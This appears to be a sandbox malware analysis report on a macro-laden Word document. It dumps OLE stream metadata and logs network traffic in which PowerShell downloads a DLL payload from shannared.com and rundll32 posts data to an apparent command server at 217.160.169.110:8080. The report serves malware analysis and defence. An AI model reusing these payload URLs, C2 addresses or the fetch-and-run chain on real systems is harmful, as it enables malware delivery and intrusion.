                                          Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 de 6e eb 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          Attribute
                                          VB_Name
                                          VBA Code

                                          Streams

                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                          General
                                          Stream Path:\x1CompObj
                                          File Type:data
                                          Stream Size:146
                                          Entropy:4.00187355764
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 312
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          File Type:data
                                          Stream Size:312
                                          Entropy:2.95489013267
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 08 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 ec 00 00 00 05 00 00 00 70 00 00 00 06 00 00 00 78 00 00 00 11 00 00 00 80 00 00 00 17 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 10 00 00 00 98 00 00 00 13 00 00 00 a0 00 00 00
                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 548
                                          General
                                          Stream Path:\x5SummaryInformation
                                          File Type:data
                                          Stream Size:548
                                          Entropy:4.00721224034
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f4 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 60 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 44 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 c8 00 00 00 09 00 00 00 d4 00 00 00
                                          Stream Path: 1Table, File Type: data, Stream Size: 6885
                                          General
                                          Stream Path:1Table
                                          File Type:data
                                          Stream Size:6885
                                          Entropy:6.02650234948
                                          Base64 Encoded:True
                                          Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                          Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                          Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 520
                                          General
                                          Stream Path:Macros/PROJECT
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:520
                                          Entropy:5.52447471798
                                          Base64 Encoded:True
                                          Data ASCII:I D = " { B 3 1 5 C D 8 3 - A E F A - 4 B 0 A - 9 9 4 6 - 6 3 1 D 4 8 9 C 2 2 F 0 } " . . D o c u m e n t = A 5 a t e 7 3 k c 6 c w 5 n j y / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z c f 1 k k 3 t 2 s s v 4 r 0 7 m . . M o d u l e = G u s c a 9 5 l u q _ . . E x e N a m e 3 2 = " J v k 5 9 3 o d o w j q u y o o " . . N a m e = " m x " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A F A D 4 6 4 D F A F 3 D 1 F 7 D 1 F 7 D 1 F 7 D 1 F 7 "
                                          Data Raw:49 44 3d 22 7b 42 33 31 35 43 44 38 33 2d 41 45 46 41 2d 34 42 30 41 2d 39 39 34 36 2d 36 33 31 44 34 38 39 43 32 32 46 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 61 74 65 37 33 6b 63 36 63 77 35 6e 6a 79 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 63 66 31 6b 6b 33 74 32 73 73 76 34 72 30 37 6d 0d 0a 4d 6f 64 75 6c 65 3d 47 75 73 63 61 39 35 6c 75 71 5f 0d
                                          Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 143
                                          General
                                          Stream Path:Macros/PROJECTwm
                                          File Type:data
                                          Stream Size:143
                                          Entropy:3.86963281051
                                          Base64 Encoded:False
                                          Data ASCII:A 5 a t e 7 3 k c 6 c w 5 n j y . A . 5 . a . t . e . 7 . 3 . k . c . 6 . c . w . 5 . n . j . y . . . Z c f 1 k k 3 t 2 s s v 4 r 0 7 m . Z . c . f . 1 . k . k . 3 . t . 2 . s . s . v . 4 . r . 0 . 7 . m . . . G u s c a 9 5 l u q _ . G . u . s . c . a . 9 . 5 . l . u . q . _ . . . . .
                                          Data Raw:41 35 61 74 65 37 33 6b 63 36 63 77 35 6e 6a 79 00 41 00 35 00 61 00 74 00 65 00 37 00 33 00 6b 00 63 00 36 00 63 00 77 00 35 00 6e 00 6a 00 79 00 00 00 5a 63 66 31 6b 6b 33 74 32 73 73 76 34 72 30 37 6d 00 5a 00 63 00 66 00 31 00 6b 00 6b 00 33 00 74 00 32 00 73 00 73 00 76 00 34 00 72 00 30 00 37 00 6d 00 00 00 47 75 73 63 61 39 35 6c 75 71 5f 00 47 00 75 00 73 00 63 00 61 00 39
                                          Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4837
                                          General
                                          Stream Path:Macros/VBA/_VBA_PROJECT
                                          File Type:data
                                          Stream Size:4837
                                          Entropy:5.51877025189
                                          Base64 Encoded:True
                                          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                          Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                          Stream Path: Macros/VBA/dir, File Type: WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435, Stream Size: 628
                                          General
                                          Stream Path:Macros/VBA/dir
                                          File Type:WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435
                                          Stream Size:628
                                          Entropy:6.34127378287
                                          Base64 Encoded:True
                                          Data ASCII:. p . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . Y m . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
                                          Data Raw:01 70 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 59 6d fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                          Stream Path: WordDocument, File Type: data, Stream Size: 129150
                                          General
                                          Stream Path:WordDocument
                                          File Type:data
                                          Stream Size:129150
                                          Entropy:7.03372694627
                                          Base64 Encoded:True
                                          Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . % . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 25 9b 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e f8 01 00 62 7f 00 00 62 7f 00 00 25 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                          Stream Path: office, File Type: data, Stream Size: 566
                                          General
                                          Stream Path:office
                                          File Type:data
                                          Stream Size:566
                                          Entropy:7.62667703991
                                          Base64 Encoded:False
                                          Data ASCII:. ~ . . . . . . 0 . . . . . a . Q . . . . u N . . . . . @ . l . Y . . . . . . . l . . . . . . . , y 0 p . . . . / . . . . . . { . . . . f . . . h . e _ . . . . . Q . . . . + . \\ . [ 3 . . . . . z . . > . H U . t . . P J . { . . ^ . M . . . ^ . . p { r . \\ . . . . . . . . . < . . . . S . . . ! . . 9 ? . . 1 6 9 . . . ` . . G w . . . . . u . . . . . K . . . . P . . . . . . . . . . 1 b . . G . . L . / ) . 9 . - . . n . . . M > . . . . . . . . . . . . . x e | . . N . l & . t . k . . + . . E . # . . I . . . O .
                                          Data Raw:05 7e 92 a5 9d 13 9e 08 30 1e 99 01 10 eb 61 9c 51 88 d9 d2 03 75 4e cf e3 8a 00 be 40 b5 6c 0e 59 06 85 8a f6 95 1f 0e 6c a3 f6 9a 1f e6 d5 ae 2c 79 30 70 e3 b5 a9 8f 2f c2 c1 13 13 df c7 7b b2 8a a8 09 66 d6 a6 bb 68 cb 65 5f 7f b3 af fd b4 51 92 c7 84 fb 2b a3 5c f5 5b 33 d4 0c fa 8c db 7a e8 95 3e cb 48 55 d2 74 07 17 50 4a 10 7b 12 c4 5e c1 4d 00 f7 b6 5e 05 ac 70 7b 72 e7 5c

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 26, 2021 13:33:15.223942995 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:15.410352945 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:15.410434008 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:15.412739992 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:15.641016006 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:15.826479912 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:15.826522112 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:15.826546907 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:15.826564074 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:15.826571941 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:15.826592922 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:15.826617002 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:15.826625109 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:15.826658010 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:15.827126980 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:15.827143908 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:15.827161074 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:15.827193022 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:15.827248096 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.014534950 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.014573097 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.014595985 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.014606953 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.014615059 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.014636993 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.014662027 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.014688969 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.014954090 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.014983892 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.015021086 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.015024900 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.015047073 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.015085936 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.015177011 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.015204906 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.015230894 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.015254021 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.015258074 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.015305996 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.016339064 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.016371012 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.016398907 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.016422033 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.016427994 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.016480923 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.016882896 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.016910076 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.016947985 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.202141047 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.202169895 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.202284098 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.202306986 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.202342033 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.202363968 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.202749014 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.202775955 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.202821016 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.203188896 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.203258038 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.203353882 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.203381062 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.203454971 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.204390049 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.204421043 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.204463959 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.206257105 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.206280947 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.206341028 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.206413031 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.207401991 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.207477093 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.393843889 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.394006014 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.394032001 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.394057035 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.394171000 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.394207954 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.395272017 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395303011 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395325899 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395347118 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395368099 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395386934 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395473003 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.395512104 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.395719051 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395745993 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395770073 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395785093 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.395793915 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.395802021 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.396123886 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396147966 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396173000 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396187067 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.396197081 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396291971 CET4916780192.168.2.22192.169.223.13
                                          Jan 26, 2021 13:33:16.396433115 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396450996 CET8049167192.169.223.13192.168.2.22
                                          Jan 26, 2021 13:33:16.396491051 CET8049167192.169.223.13192.168.2.22

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 26, 2021 13:33:15.146056890 CET5219753192.168.2.228.8.8.8
                                          Jan 26, 2021 13:33:15.206913948 CET53521978.8.8.8192.168.2.22

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Jan 26, 2021 13:33:15.146056890 CET192.168.2.228.8.8.80xb648Standard query (0)shannared.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Jan 26, 2021 13:33:15.206913948 CET8.8.8.8192.168.2.220xb648No error (0)shannared.com192.169.223.13A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • shannared.com
                                          • 217.160.169.110
                                            • 217.160.169.110:8080

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.2249167192.169.223.1380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampkBytes transferredDirectionData
                                          Jan 26, 2021 13:33:15.412739992 CET0OUTGET /content/lhALeS/ HTTP/1.1
                                          Host: shannared.com
                                          Connection: Keep-Alive
                                          Jan 26, 2021 13:33:15.826479912 CET1INHTTP/1.1 200 OK
                                          Cache-Control: no-cache, must-revalidate
                                          Pragma: no-cache
                                          Expires: Tue, 26 Jan 2021 12:33:15 GMT
                                          Content-Disposition: attachment; filename="O9TGnKaUCw.dll"
                                          Content-Transfer-Encoding: binary
                                          Set-Cookie: 60100c0bb399f=1611664395; expires=Tue, 26-Jan-2021 12:34:15 GMT; Max-Age=60; path=/
                                          Last-Modified: Tue, 26 Jan 2021 12:33:15 GMT
                                          X-XSS-Protection: 1; mode=block
                                          X-Content-Type-Options: nosniff
                                          Content-Type: application/octet-stream
                                          X-Cacheable: YES:Forced
                                          Content-Length: 631808
                                          Accept-Ranges: bytes
                                          Date: Tue, 26 Jan 2021 12:33:15 GMT
                                          Age: 0
                                          Vary: User-Agent
                                          X-Cache: uncached
                                          X-Cache-Hit: MISS
                                          X-Backend: all_requests
                                          Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0
                                          Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*0p>@@p"nCODE.0 `DATA@4@BSS`J.idata"p$J@.relocn


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.2249171217.160.169.1108080C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Jan 26, 2021 13:34:31.620852947 CET669OUTPOST /zrm2/7son14/mlqmfbi2uji6/ HTTP/1.1
                                          DNT: 0
                                          Referer: 217.160.169.110/zrm2/7son14/mlqmfbi2uji6/
                                          Content-Type: multipart/form-data; boundary=--------orf6DU5u
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: 217.160.169.110:8080
                                          Content-Length: 5748
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Jan 26, 2021 13:34:31.893688917 CET676INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Tue, 26 Jan 2021 12:34:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
